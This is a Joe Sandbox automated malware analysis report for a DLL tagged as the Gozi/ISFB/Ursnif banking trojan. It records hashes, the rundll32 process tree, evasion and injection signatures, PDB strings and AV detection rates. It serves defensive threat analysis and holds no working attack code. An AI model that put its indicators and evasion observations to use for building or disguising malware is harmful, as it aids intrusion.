Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report lj3H69Z3Io.dll

Overview

General Information

Sample Name:lj3H69Z3Io.dll
Analysis ID:447090
MD5:0bb29556ece1c51c751cb4e7c8752ddc
SHA1:324cc356a56c68e51f09348e91405001e68e4a08
SHA256:af1b052362469a67fcd871558b24efa2be44a4b29f88112e5c2d2295a1dc4252
Tags:dllGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
One or more processes crash
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 2392 cmdline: loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 2200 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6068 cmdline: rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6072 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 644 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 3860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 5776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 644 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1312 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2924 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4840 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 2948 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 660 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: lj3H69Z3Io.dllVirustotal: Detection: 41%Perma Link
Source: lj3H69Z3Io.dllReversingLabs: Detection: 31%
Source: lj3H69Z3Io.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: lj3H69Z3Io.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: shlwapi.pdb9} source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdbdj source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: profapi.pdbXPJ"i source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wtsapi32.pdbyN[ source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.533609109.0000000003110000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdbrP " source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: mpr.pdb$ source: WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbMNG source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.572578317.0000000002B70000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb[Ny source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbBPp" source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb( source: WerFault.exe, 00000015.00000003.571572737.00000000048BE000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb~PT"a source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdbDP~". source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: Bed.pdb' source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdbEOSz source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdbVPL"r source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: Bed.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdbsG7" source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbsNA source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb}IU source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000F.00000003.533933827.0000000002EAF000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.534503789.000000000310A000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.572578317.0000000002B70000.00000004.00000001.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: mpr.pdbAw source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbGNM source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbz source: WerFault.exe, 00000015.00000003.572645587.0000000002BAD000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: combase.pdb5} source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb#}#Ui source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000003.00000002.613268258.000000006E221000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.528135679.000000006E221000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.563830919.000000006E221000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000003.533122427.0000000002EEB000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.571572737.00000000048BE000.00000004.00000001.sdmp, lj3H69Z3Io.dll
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbf source: WerFault.exe, 0000000F.00000003.533122427.0000000002EEB000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: Bed.pdbBv source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb( source: WerFault.exe, 00000011.00000003.533142014.0000000003105000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb0Pb" source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: winspool.pdbUN source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbNPd" source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdblPF"e source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb?} source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdbtP." source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.533631070.0000000003116000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: combase.pdbjPX"r source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000011.00000003.533609109.0000000003110000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbK} source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: netutils.pdb>j$U source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbANs source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb-}%Ur source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb`PR"C source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 0000000F.00000003.532839639.0000000004CCE000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.570661557.00000000048DD000.00000004.00000001.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: a'pjr*pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.548507625.0000000002E32000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E218626 FindFirstFileExA,4_2_6E218626
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03092D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_03092D06
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03098005 NtQueryVirtualMemory,2_2_03098005
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D1B9C GetProcAddress,NtCreateSection,memset,3_2_6E1D1B9C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D1EC7 NtMapViewOfSection,3_2_6E1D1EC7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D2485 NtQueryVirtualMemory,3_2_6E1D2485
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_030931092_2_03093109
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03097DE02_2_03097DE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_030922062_2_03092206
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D22643_2_6E1D2264
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F7CA03_2_6E1F7CA0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1FB8403_2_6E1FB840
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2096BD3_2_6E2096BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20CEC03_2_6E20CEC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20FF3F3_2_6E20FF3F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E205FDD3_2_6E205FDD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1F7CA04_2_6E1F7CA0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1FB8404_2_6E1FB840
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2096BD4_2_6E2096BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E20CEC04_2_6E20CEC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E20FF3F4_2_6E20FF3F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E205FDD4_2_6E205FDD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E216CF94_2_6E216CF9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E219B9C4_2_6E219B9C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E204A80 appears 66 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E20B4B4 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 652
Source: lj3H69Z3Io.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engineClassification label: mal48.winDLL@17/12@0/0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0309513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_0309513E
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2924
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess644
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE636.tmpJump to behavior
Source: lj3H69Z3Io.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
Source: lj3H69Z3Io.dllVirustotal: Detection: 41%
Source: lj3H69Z3Io.dllReversingLabs: Detection: 31%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll'
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
